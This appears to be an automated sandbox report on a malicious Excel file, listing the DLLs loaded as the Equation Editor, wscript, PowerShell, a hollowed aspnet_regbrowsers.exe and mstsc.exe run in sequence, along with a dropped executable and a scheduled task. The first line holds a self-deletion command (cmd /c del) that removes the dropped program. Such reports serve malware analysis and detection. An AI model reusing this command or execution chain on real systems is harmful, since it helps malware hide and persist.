Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: wow64cpu.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: credui.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: PO.78NO9.xls Static file information: File size 1095168 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.511016346.0000000001EE0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.512113443.0000000002040000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637891163.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: aspnet_regbrowsers.pdb source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mstsc.pdb source: aspnet_regbrowsers.exe, 00000016.00000002.512368653.00000000008A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BKsn.pdbSHA256z source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
